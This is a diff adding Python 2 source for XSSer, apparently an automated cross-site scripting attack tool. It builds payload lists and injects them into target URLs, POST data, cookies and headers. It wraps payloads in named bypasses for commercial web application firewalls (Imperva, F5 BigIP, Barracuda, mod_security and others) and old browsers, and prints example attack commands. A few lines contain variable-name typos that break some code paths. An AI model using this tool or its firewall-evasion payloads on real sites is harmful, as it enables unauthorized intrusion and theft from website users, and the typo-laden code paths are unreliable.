+        # some controls about targets
+        self.urlspoll = []
+
+        # some statistics counters for connections
+        self.success_connection = 0
+        self.not_connection = 0
+        self.forwarded_connection = 0
+        self.other_connection = 0
+
+	    # some statistics counters for payloads
+        self.xsr_injection = 0
+        self.xsa_injection = 0
+        self.coo_injection = 0
+        self.manual_injection = 0
+        self.auto_injection = 0
+        self.dcp_injection = 0
+        self.dom_injection = 0
+        self.httpsr_injection = 0
+        self.check_positives = 0
+        
+        # some statistics counters for injections found
+        self.xsr_found = 0
+        self.xsa_found = 0
+        self.coo_found = 0
+        self.manual_found = 0
+        self.auto_found = 0
+        self.dcp_found = 0
+        self.dom_found = 0
+        self.httpsr_found = 0
+        self.false_positives = 0
+
+	    # some statistics counters for heuristic parameters
+        self.heuris_hashes = []
+        self.heuris_backslash_found = 0
+        self.heuris_une_backslash_found = 0
+        self.heuris_dec_backslash_found = 0
+        self.heuris_backslash_notfound = 0
+        self.heuris_slash_found = 0
+        self.heuris_une_slash_found = 0
+        self.heuris_dec_slash_found = 0
+        self.heuris_slash_notfound = 0
+        self.heuris_mayor_found = 0
+        self.heuris_une_mayor_found = 0
+        self.heuris_dec_mayor_found = 0
+        self.heuris_mayor_notfound = 0
+        self.heuris_minor_found = 0
+        self.heuris_une_minor_found = 0
+        self.heuris_dec_minor_found = 0
+        self.heuris_minor_notfound = 0
+        self.heuris_semicolon_found = 0
+        self.heuris_une_semicolon_found = 0
+        self.heuris_dec_semicolon_found = 0
+        self.heuris_semicolon_notfound = 0
+        self.heuris_colon_found = 0
+        self.heuris_une_colon_found = 0
+        self.heuris_dec_colon_found = 0
+        self.heuris_colon_notfound = 0
+        self.heuris_doublecolon_found = 0
+        self.heuris_une_doublecolon_found = 0
+        self.heuris_dec_doublecolon_found = 0
+        self.heuris_doublecolon_notfound = 0
+        self.heuris_equal_found = 0
+        self.heuris_une_equal_found = 0
+        self.heuris_dec_equal_found = 0
+        self.heuris_equal_notfound = 0
+
+        # xsser verbosity (0 - no output, 1 - dots only, 2+ - real verbosity)
+        self.verbose = 2
+        self.options = None
+
+    def __del__(self):
+        if not self._landing:
+            self.land()
+
+    def get_gtk_directory(self):
+        if self._gtkdir:
+            return self._gtkdir
+        local_path = os.path.join(os.path.dirname(os.path.dirname(__file__)),
+                                  'gtk')
+        if os.path.exists(local_path):
+            self._gtkdir = local_path
+            return self._gtkdir
+        elif os.path.exists('/usr/share/xsser/gtk'):
+            self._gtkdir = '/usr/share/xsser/gtk'
+            return self._gtkdir
+
+    def set_webbrowser(self, browser):
+        self._webbrowser = browser
+
+    def set_reporter(self, reporter):
+        self._reporter = reporter
+
+    def add_reporter(self, reporter):
+        self._reporters.append(reporter)
+
+    def remove_reporter(self, reporter):
+        if reporter in self._reporters:
+            self._reporters.remove(reporter)
+
+    def generate_hash(self, attack_type='default'):
+        """
+        Generate a new hash for a type of attack.
+        """
+        return hashlib.md5(str(datetime.datetime.now()) + attack_type).hexdigest()
+
+    def generate_numeric_hash(self): # 32 length as md5
+        """
+        Generate a new hash for numeric only XSS
+        """
+        newhash = ''.join(random.choice('0123456789') for i in range(32)) 
+        return newhash
+
+    def report(self, msg, level='info'):
+        """
+        Report some error from the application.
+
+        levels: debug, info, warning, error
+        """
+        if self.verbose == 2:
+            prefix = ""
+            if level != 'info':
+                prefix = "["+level+"] "
+            print msg
+        elif self.verbose:
+            if level == 'error':
+                sys.stdout.write("*")
+            else:
+                sys.stdout.write(".")
+        for reporter in self._reporters:
+            reporter.post(msg)
+        if self._reporter:
+            from twisted.internet import reactor
+            reactor.callFromThread(self._reporter.post, msg)
+
+    def set_options(self, options):
+        """
+        Set xsser options
+        """
+        self.options = options
+        self._opt_request()
+
+    def _opt_request(self):
+        """
+        Pass on some properties to Curl
+        """
+        options = self.options
+        for opt in ['cookie', 'agent', 'referer',\
+			'headers', 'atype', 'acred', 'acert',
+			'proxy', 'ignoreproxy', 'timeout', 
+            'delay', 'tcp_nodelay', 'retries', 
+            'xforw', 'xclient', 'threads', 
+            'dropcookie', 'followred', 'fli',
+            'nohead', 'isalive', 'alt', 'altm',
+            'ald'
+			]:
+            if hasattr(options, opt) and getattr(options, opt):
+                setattr(Curl, opt, getattr(options, opt))
+
+    def get_payloads(self):
+        """
+        Process payload options and make up the payload list for the attack.
+        """
+        options = self.options
+    	# payloading sources for --auto
+        payloads_fuzz = core.fuzzing.vectors.vectors
+        if options.fzz_info or options.fzz_num or options.fzz_rand and not options.fuzz:
+            self.options.fuzz = True
+        # set a type for XSS auto-fuzzing vectors
+        if options.fzz_info:
+            fzz_payloads = []
+            for fuzz in payloads_fuzz:
+                if not fuzz["browser"] == "[Not Info]":
+                    fzz_payloads.append(fuzz)
+            payloads_fuzz = fzz_payloads
+        # set a limit for XSS auto-fuzzing vectors
+        if options.fzz_num:
+            try:
+                options.fzz_num = int(options.fzz_num)
+            except:
+                options.fzz_num = len(payloads_fuzz)
+            fzz_num_payloads = []
+            fzz_vector = 0
+            for fuzz in payloads_fuzz:
+                fzz_vector = fzz_vector + 1
+                if int(fzz_vector) < int(options.fzz_num)+1:
+                    fzz_num_payloads.append(fuzz)
+            payloads_fuzz = fzz_num_payloads
+        # set random order for XSS auto-fuzzing vectors
+        if options.fzz_rand:
+            try:
+                from random import shuffle
+                shuffle(payloads_fuzz) # shuffle paylods
+            except:
+                pass
+        payloads_dcp = core.fuzzing.DCP.DCPvectors
+        payloads_dom = core.fuzzing.DOM.DOMvectors
+        payloads_httpsr = core.fuzzing.HTTPsr.HTTPrs_vectors
+        manual_payload = [{"payload":options.script, "browser":"[manual_injection]"}]
+        # sustitute payload for hash to check for false positives
+        self.hashed_payload = "XSS"
+        checker_payload = [{"payload":self.hashed_payload, "browser":"[hashed_precheck_system]"}]
+        # heuristic parameters
+        heuristic_params = core.fuzzing.heuristic.heuristic_test
+        def enable_options_heuristic(payloads):
+            if options.heuristic:
+                payloads = heuristic_params + payloads
+                if options.dom:
+                    payloads = payloads + payloads_dom
+            return payloads
+        if options.fuzz:
+            payloads = payloads_fuzz
+            if options.dcp:
+                payloads = payloads + payloads_dcp
+                if options.script:
+                    payloads = payloads + manual_payload
+                    if options.hash:
+                        payloads = checker_payload + payloads
+                        if options.inducedcode:
+                            payloads = payloads + payloads_httpsr
+                            if options.heuristic:
+                                payloads = heuristic_params + payloads
+                                if options.dom:
+                                    payloads = payloads + payloads_dom
+                    elif options.inducedcode:
+                        payloads = payloads + payloads_httpsr
+                        if options.heuristic:
+                            payloads = heuristic_params + payloads
+                            if options.dom:
+                                payloads = payloads + payloads_dom
+                        elif options.dom:
+                            payloads = payloads + payloads_dom
+                    elif options.heuristic:
+                        payloads = heuristic_params + payloads
+                        if options.dom:
+                            payloads = payloads + payloads_dom
+                    elif options.dom:
+                        payloads = payloads + payloads_dom
+                elif options.hash:
+                    payloads = checker_payload + payloads
+                    if options.inducedcode:
+                        payloads = payloads + payloads_httpsr
+                        if options.heuristic:
+                            payloads = heuristic_params + payloads
+                            if options.dom:
+                                payloads = payloads + payloads_dom
+                        elif options.dom:
+                            payloads = payloads + payloads_dom
+                elif options.inducedcode:
+                    payloads = payloads + payloads_httpsr
+                    if options.heuristic:
+                        payloads = heuristic_params + payloads
+                        if options.dom:
+                            payloads = payloads + payloads_dom
+                    elif options.dom:
+                        payloads = payloads + payloads_dom
+            elif options.script:
+                payloads = payloads + manual_payload
+                if options.hash:
+                    payloads = checker_payload + payloads
+                    if options.inducedcode:
+                        payloads = payaloads + payloads_httpsr
+                        if options.heuristic:
+                            payloads = heuristic_params + payloads
+                            if options.dom:
+                                payloads = payloads + payloads_dom
+            elif options.hash:
+                payloads = checker_payload + payloads
+                if options.inducedcode:
+                    payloads = payloads + payloads_httpsr
+                    if options.heuristic:
+                        payloads = heuristic_params + payloads
+                        if options.dom:
+                            payloads = payloads + payloads_dom
+                    elif options.dom:
+                        payloads = payloads + payloads_dom
+                elif options.heuristic:
+                    payloads = heuristic_params + payloads
+                    if options.dom:
+                        payloads = payloads + payloads_dom
+                elif options.dom:
+                    payloads = payloads + payloads_dom
+            elif options.inducedcode:
+                payloads = payloads + payloads_httpsr
+                if options.hash:
+                    payloads = checker_payload + payloads
+                    if options.heuristic:
+                        payloads = heuristic_params + payloads
+                        if options.dom:
+                            payloads = payloads + payloads_dom
+                    elif options.dom:
+                        payloads = payloads + payloads_dom
+            elif options.heuristic:
+                payloads = heuristic_params + payloads
+                if options.dom:
+                    payloads = payloads + payloads_dom
+            elif options.dom:
+                payloads = payloads + payloads_dom
+        elif options.dcp:
+            payloads = payloads_dcp
+            if options.script:
+                payloads = payloads + manual_payload
+                if options.hash:
+                    payloads = checker_payload + payloads
+                    if options.inducedcode:
+                        payloads = payloads + payloads_httpsr
+                        if options.heuristic:
+                            payloads = heuristic_params + payloads
+                            if options.dom:
+                                payloads = payloads + payloads_dom
+            elif options.hash:
+                payloads = checker_payload + payloads
+                if options.inducedcode:
+                    payloads = payloads + inducedcode
+                    if options.heuristic:
+                        payloads = heuristic_params + payloads
+                        if options.dom:
+                            payloads = payloads + payloads_dom
+                    elif options.dom:
+                        payloads = payloads + payloads_dom
+            elif options.inducedcode:
+                payloads = payloads + payloads_httpsr
+                if options.heuristic:
+                    payloads = heuristic_params + payloads
+                    if options.dom:
+                        payloads = payloads + payloads_dom
+                elif options.dom:
+                    payloads = payloads + payloads_dom
+            elif options.heuristic:
+                payloads = heuristic_params + payloads
+                if options.dom:
+                    payloads = payloads + payloads_dom
+            elif options.dom:
+                payloads = payloads + payloads_dom
+        elif options.script:
+            payloads = manual_payload
+            if options.hash:
+                payloads = checker_payload + payloads
+                if options.inducedcode:
+                    payloads = payloads + payloads_httpsr
+                    if options.heuristic:
+                        payloads = heuristic_params + payloads
+                        if options.dom:
+                            payloads = payloads + payloads_dom
+            elif options.inducedcode:
+                payloads = payloads + payloads_httpsr
+                if options.heuristic:
+                    payloads = heuristic_params + payloads
+                    if options.dom:
+                        payloads = payloads + payloads_dom
+                elif options.dom:
+                    payloads = payloads + payloads_dom
+            elif options.heuristic:
+                payloads = heuristic_params + payloads
+                if options.dom:
+                    paylaods = payloads + payloads_dom
+            elif options.dom:
+                payloads = payloads + payloads_dom
+        elif options.inducedcode:
+            payloads = payloads_httpsr
+            if options.hash:
+                payloads = checker_payload + payloads
+                if options.heuristic:
+                    payloads = heuristic_params + payloads
+                    if options.dom:
+                        payloads = payloads + payloads_dom
+            elif options.heuristic:
+                payloads = heuristic_params + payloads
+                if options.dom:
+                    payloads = payloads + payloads_dom
+            elif options.dom:
+                payloads = payloads + payloads_dom
+        elif options.heuristic:
+            payloads = heuristic_params
+            if options.hash:
+                payloads = checker_payload + payloads
+                if options.dom:
+                    payloads = payloads + payloads_dom
+            elif options.dom:
+                payloads = payloads + payloads_dom
+        elif options.dom:
+            payloads = payloads_dom
+        elif not options.fuzz and not options.dcp and not options.script and not options.hash and not options.inducedcode and not options.heuristic and not options.dom:
+            payloads = [{"payload":'">PAYLOAD',
+			 "browser":"[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]"
+                         }]
+        else:
+            payloads = checker_payload
+        return payloads
+
+    def process_ipfuzzing(self, text):
+        """
+        Mask ips in given text to DWORD
+        """
+        ips = re.findall("\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}", text)
+        for ip in ips:
+            text = text.replace(ip, str(self._ipDwordEncode(ip)))
+        return text
+
+    def process_ipfuzzing_octal(self, text):
+        """
+       	Mask ips in given text to Octal
+	    """
+        ips = re.findall("\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}", text)
+        for ip in ips:
+            text = text.replace(ip, str(self._ipOctalEncode(ip)))
+        return text
+
+    def process_payloads_ipfuzzing(self, payloads):
+        """
+        Mask ips for all given payloads using DWORD
+        """
+        # ip fuzzing (DWORD)
+        if self.options.Dwo:
+            resulting_payloads = []
+            for payload in payloads:
+                payload["payload"] = self.process_ipfuzzing(payload["payload"])
+                resulting_payloads.append(payload)
+            return resulting_payloads
+        return payloads
+
+    def process_payloads_ipfuzzing_octal(self, payloads):
+        """
+        Mask ips for all given payloads using OCTAL
+        """
+        # ip fuzzing (OCTAL)
+        if self.options.Doo:
+            resulting_payloads = []
+            for payload in payloads:
+                payload["payload"] = self.process_ipfuzzing_octal(payload["payload"])
+                resulting_payloads.append(payload)
+            return resulting_payloads
+        return payloads
+
+    def get_query_string(self):
+        """
+        Get the supplied query string.
+        """
+        if self.options.postdata:
+            return self.options.postdata
+        elif self.options.getdata:
+            return self.options.getdata
+        return ""
+
+    def attack_url(self, url, payloads, query_string):
+        """
+        Attack the given url checking or not if is correct.
+        """
+        if not self.options.nohead:
+            for payload in payloads:
+                self.rounds = self.rounds + 1
+                self.attack_url_payload(url, payload, query_string)
+        else:
+            hc = Curl()
+            try:
+                urls = hc.do_head_check([url])
+            except:
+                self.report("[Error] Target URL: (" + url + ") is malformed!" + " [DISCARDED]" + "\n")
+                return
+            self.report("-"*50 + "\n")
+            if str(hc.info()["http-code"]) in ["200", "302", "301", "401"]:
+                if str(hc.info()["http-code"]) in ["301"]:
+                    url = str(hc.info()["Location"])
+                    payload = ""
+                    query_string = ""
+                elif str(hc.info()["http-code"]) in ["302"]:
+                    url = url + "/"
+                    payload = ""
+                    query_string = ""
+                self.success_connection = self.success_connection + 1
+                self.report("[Info] HEAD-CHECK: OK! [HTTP-" + hc.info()["http-code"] + "] -> [AIMED]\n")
+                for payload in payloads:
+                    self.attack_url_payload(url, payload, query_string)
+            else:
+                if str(hc.info()["http-code"]) in ["405"]:
+                    self.report("[Info] HEAD-CHECK: NOT ALLOWED! [HTTP-" + hc.info()["http-code"] + "] -> [PASSING]\n")
+                    self.success_connection = self.success_connection + 1
+                    for payload in payloads:
+                        self.attack_url_payload(url, payload, query_string)
+                else:
+                    self.not_connection = self.not_connection + 1
+                    self.report("[Error] HEAD-CHECK: FAILED! [HTTP-" + hc.info()["http-code"] + "] -> [DISCARDED]\n")
+            self.report("-"*50 + "\n")
+
+    def not_keyword_exit(self):
+        self.report("="*30)
+        self.report("\n[Error] XSSer cannot find a correct place to start an attack. Aborting!...\n")
+        self.report("-"*25)
+        self.report("\n[Info] This is because you aren't providing:\n\n At least one -payloader- using a keyword: 'XSS' (for hex.hash) or 'X1S' (for int.hash):\n")
+        self.report("  - ex (GET): xsser -u 'https://target.com' -g '/path/profile.php?username=bob&surname=XSS&age=X1S&job=XSS'")
+        self.report("  - ex (POST): xsser -u 'https://target.com/login.php' -p 'username=bob&password=XSS&captcha=X1S'\n")
+        self.report(" Any extra attack(s) (Xsa, Xsr, Coo, Dorker, Crawler...):\n")
+        self.report("  - ex (GET+Cookie): xsser -u 'https://target.com' -g '/path/id.php?=2' --Coo")
+        self.report("  - ex (POST+XSA+XSR+Cookie): xsser -u 'https://target.com/login.php' -p 'username=admin&password=admin' --Xsa --Xsr --Coo")
+        self.report("  - ex (Dorker): xsser -d 'news.php?id=' --Da")
+        self.report("  - ex (Crawler): xsser -u 'https://target.com' -c 100 --Cl\n")
+        self.report(" Or a mixture:\n")
+        self.report("  - ex (GET+Manual): xsser -u 'https://target.com' -g '/users/profile.php?user=XSS&salary=X1S' --payload='<script>alert(XSS);</script>'")
+        self.report("  - ex (POST+Manual): xsser -u 'https://target.com/login.asp' -p 'username=bob&password=XSS' --payload='}}%%&//<sc&ri/pt>(XSS)--;>'\n")
+        self.report("  - ex (GET+Cookie): xsser -u 'https://target.com' -g '/login.asp?user=bob&password=XSS' --Coo")
+        self.report("  - ex (POST+XSR+XSA): xsser -u 'https://target.com/login.asp' -p 'username=bob&password=XSS' --Xsr --Xsa\n")
+        self.report("="*75 + "\n")
+        if not self.options.xsser_gtk:
+            sys.exit(2)
+        else:
+            pass
+
+    def get_url_payload(self, url, payload, query_string, user_attack_payload):
+        """
+        Attack the given url with the given payload
+        """
+        options = self.options
+        self._ongoing_attacks = {}
+        if (self.options.xsa or self.options.xsr or self.options.coo):
+            agent, referer, cookie  = self._prepare_extra_attacks(payload)
+        else:
+            agents = [] # user-agents
+            try:
+                f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents
+            except:
+                f = open("fuzzing/user-agents.txt").readlines() # set path for user-agents when testing
+            for line in f:
+                agents.append(line)
+            agent = random.choice(agents).strip() # set random user-agent
+            referer = "127.0.0.1"
+            cookie = None
+
+        if options.agent:
+            agent = options.agent
+        else:
+            self.options.agent = agent
+        if options.referer:
+            referer = options.referer
+        else:
+            self.options.referer = referer
+        if options.cookie:
+            cookie = options.cookie
+        else:
+            self.options.cookie = cookie
+
+        # get payload/vector
+        payload_string = payload['payload'].strip()
+  
+        ### Anti-antiXSS exploits
+        # PHPIDS (>0.6.5) [ALL] -> 32*payload + payload
+        if options.phpids065:
+            payload_string = 32*payload_string + payload_string
+
+        # PHPIDS (>0.7) [ALL] -> payload: 'svg-onload' (23/04/2016)
+        if options.phpids070:
+            payload_string = '<svg+onload=+"'+payload_string+'">'
+
+        # Imperva Incapsula [ALL] -> payload: 'img onerror' + payload[DoubleURL+HTML+Unicode] 18/02/2016 
+        if options.imperva:
+            payload_string = '<img src=x onerror="'+payload_string+'">'
+
+        # WebKnight (>4.1) [Chrome] payload: 'details ontoggle' 18/02/2016 
+        if options.webknight:
+            payload_string = '<details ontoggle='+payload_string+'>'
+
+        # F5BigIP [Chrome+FF+Opera] payload: 'onwheel' 18/02/2016 
+        if options.f5bigip:
+            payload_string = '<body style="height:1000px" onwheel="'+payload_string+'">'
+ 
+        # Barracuda WAF [ALL] payload: 'onwheel' 18/02/2016 
+        if options.barracuda:
+            payload_string = '<body style="height:1000px" onwheel="'+payload_string+'">'
+
+        # Apache / modsec [ALL] payload: special 18/02/2016 
+        if options.modsec:
+            payload_string = '<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover='+payload_string+'>'
+
+        # QuickDefense [Chrome] payload: 'ontoggle' + payload[Unicode] 18/02/2016 
+        if options.quickdefense:
+            payload_string = '<details ontoggle="'+payload_string+'">'
+
+        # Firefox 12 (and below) # 09/2019
+        if options.firefox:
+            payload_string = "<script type ='text/javascript'>"+payload_string+"</script>"
+
+        # Chrome 19 (and below, but also Firefox 12 and below) # 09/2019
+        if options.chrome:
+            payload_string = "<script>/*///*/"+payload_string+"</script>"
+
+        # Internet Explorer 9 (but also Firefox 12 and below) # 09/2019
+        if options.iexplorer:
+            payload_string = 'cooki1%3dvalue1;%0d%0aX-XSS-Protection:0%0d%0a%0d%0a<html><body><script>'+payload_string+'</script></body></html>'
+
+        # Opera 10.6 (but also IE6) # 09/2019
+        if options.opera:
+            payload_string = "<Table background = javascript: alert ("+payload_string+")> </ table>"
+
+        # Substitute the attacking hash
+        if 'PAYLOAD' in payload_string or 'VECTOR' in payload_string:
+            payload_string = payload_string.replace('PAYLOAD', self.DEFAULT_XSS_PAYLOAD)
+            payload_string = payload_string.replace('VECTOR', self.DEFAULT_XSS_PAYLOAD)
+
+        hashed_payload = payload_string
+
+        # Imperva
+        if options.imperva:
+            hashed_payload = urllib.urlencode({'':hashed_payload})
+            hashed_payload = urllib.urlencode({'':hashed_payload}) #DoubleURL encoding
+            hashed_payload = cgi.escape(hashed_payload) # + HTML encoding
+            hashed_payload = unicode(hashed_payload) # + Unicode
+
+        # Quick Defense
+        if options.quickdefense:
+            hashed_payload = unicode(hashed_payload) # + Unicode
+
+        # apply user final attack url payload
+        if user_attack_payload:
+            hashed_vector_url = self.encoding_permutations(user_attack_payload)
+        else:
+            hashed_vector_url = self.encoding_permutations(hashed_payload)
+
+        # replace special payload string also for extra attacks
+        if self.extra_hashed_injections:
+            hashed_payload = hashed_payload.replace('XSS', 'PAYLOAD')
+            for k, v in self.extra_hashed_injections.iteritems():
+                if v[1] in hashed_payload:
+                    self.extra_hashed_vector_url[k] = v[0], hashed_payload
+            self.extra_hashed_injections = self.extra_hashed_vector_url
+        if not options.getdata: # using GET as a single input (-u)
+            target_url = url
+        else:
+            if not url.endswith("/") and not options.getdata.startswith("/"):
+                url = url + "/"
+            target_url = url + options.getdata
+        p_uri = urlparse(target_url)
+        uri = p_uri.netloc
+        path = p_uri.path
+        if not uri.endswith('/') and not path.startswith('/'):
+            uri = uri + "/"
+        if self.options.target or self.options.crawling: # for audit entire target allows target without 'XSS/X1S' keyword
+            if not "XSS" in target_url:
+                if not target_url.endswith("/"):
+                    target_url = target_url + "/XSS"
+                else:
+                    target_url = target_url + "XSS"
+        target_params = parse_qs(urlparse(target_url).query, keep_blank_values=True)
+        if self.options.script:
+            if not 'XSS' in self.options.script and not self.options.crawling: # 'XSS' keyword used to change PAYLOAD at target_params
+                self.not_keyword_exit()
+        if not target_params and not options.postdata:
+            if not self.options.xsa and not self.options.xsr and not self.options.coo: # extra attacks payloads
+                if not 'XSS' in target_url and not 'X1S' in target_url and not self.options.crawling: # not any payloader found!
+                    self.not_keyword_exit()
+                else: # keyword found at target url (ex: https://target.com/XSS)
+                    if 'XSS' in target_url:
+                        url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection
+                    elif 'X1S' in target_url:
+                        url_orig_hash = self.generate_numeric_hash() # new hash for each parameter with an injection
+                    hashed_payload = payload_string.replace('XSS', url_orig_hash)
+                    if "[B64]" in hashed_payload: # [DCP Injection]
+                        dcp_payload = hashed_payload.split("[B64]")[1]
+                        dcp_preload = hashed_payload.split("[B64]")[0]
+                        dcp_payload = b64encode(dcp_payload)
+                        hashed_payload = dcp_preload + dcp_payload
+                    self.hashed_injections[url_orig_hash] = target_url
+                    if user_attack_payload:
+                        pass
+                    else:
+                        hashed_vector_url = self.encoding_permutations(hashed_payload)
+                    target_params[''] = hashed_vector_url # special target_param when XSS only at target_url
+                    target_url_params = urllib.urlencode(target_params)
+                    if not uri.endswith('/') and not path.startswith('/'):
+                        uri = uri + "/"
+                    dest_url = p_uri.scheme + "://" + uri + path
+                    if not "XSS" in dest_url:
+                        if not dest_url.endswith("/"):
+                            dest_url = dest_url + "/" + hashed_vector_url
+                        else:
+                            dest_url = dest_url + hashed_vector_url
+                    else:
+                        if 'XSS' in dest_url:
+                            dest_url = dest_url.replace('XSS', hashed_vector_url)
+                        if 'X1S' in dest_url:
+                            dest_url = dest_url.replace('X1S', hashed_vector_url)
+            else:
+                if 'XSS' in target_url:
+                    url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection
+                elif 'X1S' in target_url:
+                    url_orig_hash = self.generate_numeric_hash() # new hash for each parameter with an injection
+                hashed_payload = payload_string.replace('XSS', url_orig_hash)
+                if "[B64]" in hashed_payload: # [DCP Injection]
+                    dcp_payload = hashed_payload.split("[B64]")[1]
+                    dcp_preload = hashed_payload.split("[B64]")[0]
+                    dcp_payload = b64encode(dcp_payload)
+                    hashed_payload = dcp_preload + dcp_payload
+                self.hashed_injections[url_orig_hash] = target_url
+                if user_attack_payload:
+                    pass
+                else:
+                    hashed_vector_url = self.encoding_permutations(hashed_payload)
+                target_params[''] = hashed_vector_url # special target_param when XSS only at target_url
+                target_url_params = urllib.urlencode(target_params)
+                if not uri.endswith('/') and not path.startswith('/'):
+                    uri = uri + "/"
+                dest_url = p_uri.scheme + "://" + uri + path
+                if 'XSS' in dest_url:
+                    dest_url = dest_url.replace('XSS', hashed_vector_url)
+                if 'X1S' in dest_url:
+                    dest_url = dest_url.replace('X1S', hashed_vector_url)
+                dest_url = p_uri.scheme + "://" + uri + path + "?" + target_url_params
+        else:
+            if not options.postdata:
+                r = 0
+                for key, value in target_params.iteritems(): # parse params searching for keywords
+                    for v in value:
+                        if v == 'XSS' or v == 'X1S': # user input keywords where inject a payload
+                            if v == 'XSS':
+                                url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection
+                            elif v == 'X1S':
+                                url_orig_hash = self.generate_numeric_hash() # new hash for each parameter with an injection
+                            hashed_payload = payload_string.replace('XSS', url_orig_hash)
+                            if "[B64]" in hashed_payload: # [DCP Injection]
+                                dcp_payload = hashed_payload.split("[B64]")[1]
+                                dcp_preload = hashed_payload.split("[B64]")[0]
+                                dcp_payload = b64encode(dcp_payload)
+                                hashed_payload = dcp_preload + dcp_payload
+                            self.hashed_injections[url_orig_hash] = key
+                            if user_attack_payload:
+                                pass
+                            else:
+                                hashed_vector_url = self.encoding_permutations(hashed_payload)
+                            target_params[key] = hashed_vector_url
+                            r = r + 1
+                        else:
+                            if self.options.xsa or self.options.xsr or self.options.coo:
+                                url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection
+                                self.hashed_injections[url_orig_hash] = key
+                                target_params[key] = v
+                                r = r + 1
+                            else:
+                                target_params[key] = v
+                if r == 0 and not self.options.xsa and not self.options.xsr and not self.options.coo and not self.options.crawling:
+                    self.not_keyword_exit()
+                payload_url = query_string.strip() + hashed_vector_url
+                target_url_params = urllib.urlencode(target_params)
+                dest_url = p_uri.scheme + "://" + uri + path + "?" + target_url_params
+            else: # using POST provided by parameter (-p)
+                target_params = parse_qs(query_string, keep_blank_values=True)
+                r = 0
+                for key, value in target_params.iteritems(): # parse params searching for keywords
+                    for v in value:
+                        if v == 'XSS' or v == 'X1S': # user input keywords where inject a payload
+                            if v == 'XSS':
+                                url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection
+                            elif v == 'X1S':
+                                url_orig_hash = self.generate_numeric_hash() # new hash for each parameter with an injection
+                            hashed_payload = payload_string.replace('XSS', url_orig_hash)
+                            if "[B64]" in hashed_payload: # [DCP Injection]
+                                dcp_payload = hashed_payload.split("[B64]")[1]
+                                dcp_preload = hashed_payload.split("[B64]")[0]
+                                dcp_payload = b64encode(dcp_payload)
+                                hashed_payload = dcp_preload + dcp_payload
+                            self.hashed_injections[url_orig_hash] = key
+                            if user_attack_payload:
+                                pass
+                            else:
+                                hashed_vector_url = self.encoding_permutations(hashed_payload)
+                            target_params[key] = hashed_vector_url
+                            r = r + 1
+                        else:
+                            if self.options.xsa or self.options.xsr or self.options.coo:
+                                url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection
+                                self.hashed_injections[url_orig_hash] = key
+                                target_params[key] = v
+                                r = r + 1
+                            else:
+                                target_params[key] = v
+                if r == 0 and not self.options.xsa and not self.options.xsr and not self.options.coo and not self.options.crawling:
+                    self.not_keyword_exit()
+                target_url_params = urllib.urlencode(target_params)
+                dest_url = target_url_params
+        self._ongoing_attacks['url'] = url_orig_hash
+        return dest_url, agent, referer, cookie
+
+    def attack_url_payload(self, url, payload, query_string):
+        if not self.pool:
+            pool = self.mothership.pool
+        else:
+            pool = self.pool
+        c = Curl()
+        if self.options.getdata or not self.options.postdata:
+            dest_url, agent, referer, cookie = self.get_url_payload(url, payload, query_string, None)
+            def _cb(request, result):
+                self.finish_attack_url_payload(c, request, result, payload,
+                                               query_string, url, dest_url)
+            _error_cb = self.error_attack_url_payload
+            def _error_cb(request, error):
+                self.error_attack_url_payload(c, url, request, error)
+            c.agent = agent
+            c.referer = referer
+            c.cookie = cookie
+            if " " in dest_url: # parse blank spaces
+                dest_url = dest_url.replace(" ", "+")
+            pool.addRequest(c.get, [[dest_url]], _cb, _error_cb)
+            self._ongoing_requests += 1
+        if self.options.postdata:
+            dest_url, agent, referer, cookie = self.get_url_payload("", payload, query_string, None)
+            def _cb(request, result):
+                self.finish_attack_url_payload(c, request, result, payload,
+                                               query_string, url, dest_url)
+            _error_cb = self.error_attack_url_payload
+            def _error_cb(request, error):
+                self.error_attack_url_payload(c, url, request, error)
+            dest_url = dest_url.strip().replace("/", "", 1)
+            c.agent = agent
+            c.referer = referer
+            c.cookie = cookie
+            pool.addRequest(c.post, [[url, dest_url]], _cb, _error_cb)
+            self._ongoing_requests += 1
+
+    def error_attack_url_payload(self, c, url, request, error):
+        self._ongoing_requests -= 1
+        for reporter in self._reporters:
+            reporter.mosquito_crashed(url, str(error[0]))
+        dest_url = request.args[0]
+        self.report("Failed attempt (URL Malformed!?): " + url + "\n")
+        self.urlmalformed = True
+        if self.urlmalformed == True and self.urlspoll[0] == url:
+            self.land()
+        self.report(str(error[0]))
+        if self.options.verbose:
+            traceback.print_tb(error[2])
+        c.close()
+        del c
+        return
+
+    def finish_attack_url_payload(self, c, request, result, payload,
+                                  query_string, url, dest_url):
+        self.round_complete = self.round_complete + 1
+        self.report("="*75)
+        self.report("[*] Test: [ "+str(self.round_complete)+"/"+str(self.rounds)+" ] <-> "+str(self.time))
+        self.report("="*75)
+        self.report("\n[+] Target: \n\n [ "+ str(url) + " ]\n")
+        self._ongoing_requests -= 1
+        # adding constant head check number flag
+        if self.options.isalive:
+            self.flag_isalive_num = int(self.options.isalive)
+        if self.options.isalive <= 0:
+            pass
+        elif self.options.isalive and not self.options.nohead:
+            self.errors_isalive = self.errors_isalive + 1
+            if self.errors_isalive > self.options.isalive:
+                pass
+            else:
+                self.report("---------------------")
+                self.report("Alive Checker for: " + url + " - [", self.errors_isalive, "/", self.options.isalive, "]\n")
+            if self.next_isalive == True:
+                hc = Curl()
+                self.next_isalive = False
+                try:
+                    urls = hc.do_head_check([url])
+                except:
+                    print "[Error] Target url: (" + url + ") is unaccesible!" + " [DISCARDED]" + "\n"
+                    self.errors_isalive = 0
+                    return
+                if str(hc.info()["http-code"]) in ["200", "302", "301", "401"]:
+                    print "HEAD alive check: OK" + "(" + hc.info()["http-code"] + ")\n"
+                    print "- Your target still Alive: " + "(" + url + ")"
+                    print "- If you are receiving continuous 404 errors requests on your injections but your target is alive is because:\n"
+                    print "          - your injections are failing: normal :-)"
+                    print "          - maybe exists some IPS/NIDS/... systems blocking your requests!\n"
+                else:
+                    if str(hc.info()["http-code"]) == "0":
+                        print "\n[Error] Target url: (" + url + ") is unaccesible!" + " [DISCARDED]" + "\n"
+                    else:
